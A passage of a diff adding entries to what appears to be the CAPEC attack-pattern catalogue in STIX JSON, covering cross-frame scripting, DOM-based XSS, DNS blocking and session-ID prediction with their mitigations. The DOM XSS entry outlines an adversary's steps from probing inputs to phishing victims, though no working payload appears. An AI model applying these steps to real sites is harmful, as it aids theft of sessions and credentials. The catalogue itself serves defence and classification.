"Modify Data (Attackers can modify objects or data that was assumed to be safe from modification.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must unserialize data before validation." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Validate object before deserialization process\n ", + "id": "course-of-action--d3dc78e4-1172-4e81-87c5-6634276605ca", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--50611ddc-8881-4263-bab2-125e6dffc2dd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3dc78e4-1172-4e81-87c5-6634276605ca", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Design: Limit which types can be deserialized.\n ", + "id": "course-of-action--e63f8da1-f215-492e-82d4-08bf836643b5", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c5e70b1-a550-4e28-b4d8-d9530d4fab32", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e63f8da1-f215-492e-82d4-08bf836643b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Use an allowlist of acceptable classes.\n ", + "id": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--be57abfe-85d5-4551-999f-0b9a7599d222", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Keep session state on the server, when possible.\n ", + "id": "course-of-action--acbc51fe-6e63-467b-9f6c-4251ff581eee", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + 
"x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e21732f4-8d62-489d-a0d9-028bc964377b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--acbc51fe-6e63-467b-9f6c-4251ff581eee", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern combines malicious Javascript and a legitimate webpage loaded into a concealed iframe. The malicious Javascript is then able to interact with a legitimate webpage in a manner that is unknown to the user. This attack usually leverages some element of social engineering in that an attacker must convinces a user to visit a web page that the attacker controls.", + "external_references": [ + { + "external_id": "CAPEC-587", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/587.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Cross Frame Scripting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Frame_Scripting" + }, + { + "description": "Cross Frame Scripting, 2016, OWASP", + "external_id": "REF-469", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Cross_Frame_Scripting" + }, + { + "description": "Gustave Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson, Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites, 2010--07---20", + "external_id": "REF-470", + "source_name": 
"reference_from_CAPEC", + "url": "https://seclab.stanford.edu/websec/framebusting/framebust.pdf" + } + ], + "id": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Cross Frame Scripting (XFS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Cross Frame Scripting allows an adversary to steal sensitive data from a legitimate site.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "An adversary-controlled webpage contains malicious Javascript and a concealed iframe containing a legitimate website login (i.e., the concealed iframe would make it appear as though the actual legitimate website was loaded). When the user interacts with the legitimate website in the iframe, the malicious Javascript collects that sensitive information." + ], + "x_capec_prerequisites": [ + "The user's browser must have vulnerabilities in its implementation of the same-origin policy. It allows certain data in a loaded page to originate from different servers/domains." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid clicking on untrusted links.", + "id": "course-of-action--56d38673-9752-418f-9de4-189f1a3b3e9e", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-587-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3562cf5-2484-4ed5-97e3-8da8f0bf5ea7", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--56d38673-9752-418f-9de4-189f1a3b3e9e", + "spec_version": "2.1", + "target_ref": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ techniques such as frame busting, which is a method by which developers aim to prevent their site being loaded within a frame.", + "id": "course-of-action--8ce90bd8-35f9-463c-80c0-9649c43ca63b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-587-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--de5b8ee3-b664-4dc0-8e2e-e49c5c3df549", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ce90bd8-35f9-463c-80c0-9649c43ca63b", + "spec_version": "2.1", + "target_ref": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is inserted into the client-side HTML being parsed by a web browser. Content served by a vulnerable web application includes script code used to manipulate the Document Object Model (DOM). This script code either does not properly validate input, or does not perform proper output encoding, thus creating an opportunity for an adversary to inject a malicious script launch a XSS attack. A key distinction between other XSS attacks and DOM-based attacks is that in other XSS attacks, the malicious script runs when the vulnerable web page is initially loaded, while a DOM-based attack executes sometime after the page loads. Another distinction of DOM-based attacks is that in some cases, the malicious script is never sent to the vulnerable web server at all. 
An attack like this is guaranteed to bypass any server-side filtering attempts to protect users.", + "external_references": [ + { + "external_id": "CAPEC-588", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/588.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "Reflected DOM Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Reflected_DOM_Injection" + }, + { + "description": "Amit Klein, DOM Based Cross Site Scripting or XSS of the Third Kind", + "external_id": "REF-471", + "source_name": "reference_from_CAPEC", + "url": "http://www.webappsec.org/projects/articles/071105.shtml" + }, + { + "description": "Jakob Kallin, Irene Lobo Valbuena, A comprehensive tutorial on cross-site scripting", + "external_id": "REF-472", + "source_name": "reference_from_CAPEC", + "url": "https://excess-xss.com/" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-618", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DOM-Based XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + 
"x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful DOM-based XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful DOM-based XSS attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.\n http://my.site.com/aform.html?mode=full\n The application’s client-side code may want to print this mode value to the screen to give the users an understanding of what mode they are in. 
In this example, JavaScript is used to pull the value from the URL and update the HTML by dynamically manipulating the DOM via a document.write() call.\n \n Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim’s browser:\n http://my.site.com/aform.html?mode=\n ", + "\n In some DOM-based attacks, the malicious script never gets sent to the web server at all, thus bypassing any server-side protections that might be in place. Consider the previously used web application that displays the mode value. Since the HTML is being generated dynamically through DOM manipulations, a URL fragment (i.e., the part of a URL after the '#' character) can be used.\n http://my.site.com/aform.html#mode=\n In this variation of a DOM-based XSS attack, the malicious script will not be sent to the web server, but will instead be managed by the victim's browser and is still available to the client-side script code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for DOM-based XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. Specific to DOM-based XSS, the adversary is looking for areas where input is being used to directly change the DOM.

  2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they were properly encoded, replaced, or filtered out.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim. In DOM-based XSS, the malicious script might not even be sent to the server, since the victim's browser will manipulate the DOM itself. This can help avoid serve-side detection mechanisms.

  4. Techniques
    Change a URL parameter to include a malicious script tag.
    Add a URL fragment to alter the value of the expected Document object URL.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + "attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that manipulates the DOM via client-side scripting.", + "An application that failS to adequately sanitize or encode untrusted input." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write scripts of some complexity and to inject it through user controlled fields in the system." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use browser technologies that do not allow client-side scripting.", + "id": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--279f0698-c251-4497-8cf6-8dd35638757e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "spec_version": "2.1", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize proper character encoding for all output produced within client-site scripts manipulating the DOM.", + "id": "course-of-action--581c316a-7f9b-45f5-bb4d-b096f6162dab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6f81714-a1aa-46d0-ad1e-fdbfa6e5814e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--581c316a-7f9b-45f5-bb4d-b096f6162dab", + "spec_version": "2.1", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before use.", + "id": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--19dedc30-dbcc-4fd6-bad2-bade72cef5d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "spec_version": "2.1", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts traffic and intentionally drops DNS requests based on content in the request. 
In this way, the adversary can deny the availability of specific services or content to the user even if the IP address is changed.", + "external_references": [ + { + "external_id": "CAPEC-589", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/589.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Censorship in the Wild: Analyzing Internet Filtering in Syria, 2014, Sigcomm", + "external_id": "REF-473", + "source_name": "reference_from_CAPEC", + "url": "http://conferences2.sigcomm.org/imc/2014/papers/p285.pdf" + } + ], + "id": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DNS Blocking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Preventing DNS from resolving a request denies the availability of a target site or service for the user.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Full URL Based Filtering: Filtering based upon the requested URL.\n URL String-based Filtering: Filtering based upon the use of particular strings included in the requested URL.\n " + ], + "x_capec_prerequisites": [ + "This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hard Coded Alternate DNS server in applications", + "id": "course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--428bf1f5-901f-40d8-aeb9-ab5da829f74e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8", + "spec_version": "2.1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid dependence on DNS", + "id": "course-of-action--7e0432d6-34d5-4694-a138-b9561cac5a25", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2679eb47-74ab-4dab-8fa0-80041226d78e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--7e0432d6-34d5-4694-a138-b9561cac5a25", + "spec_version": "2.1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Include \"hosts file\"/IP address in the application.", + "id": "course-of-action--e4470b31-8c3a-47da-a2b2-1fdf946e88f1", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f64c49e-d265-4f33-afbc-5434b791104b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e4470b31-8c3a-47da-a2b2-1fdf946e88f1", + "spec_version": "2.1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure best practices with respect to communications channel protections.", + "id": "course-of-action--278ea0bd-2f3e-44e3-8398-566da0f8b0a1", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59fe24de-1db9-45eb-8e29-7ca9bc4049d1", + 
"modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--278ea0bd-2f3e-44e3-8398-566da0f8b0a1", + "spec_version": "2.1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a .onion domain with Tor support", + "id": "course-of-action--8fb9876b-b0f0-4204-b8dc-c89ee967c2c8", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--43839acc-f71a-4622-9a26-8bf9926bbfc4", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb9876b-b0f0-4204-b8dc-c89ee967c2c8", + "spec_version": "2.1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets predictable session ID in order to gain privileges. 
The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.", + "external_references": [ + { + "external_id": "CAPEC-59", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-331", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/331.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-488", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Credential/Session Prediction", + "external_id": "18", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Credential/Session-Prediction" + }, + { + "description": "Session Prediction", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_Prediction" + 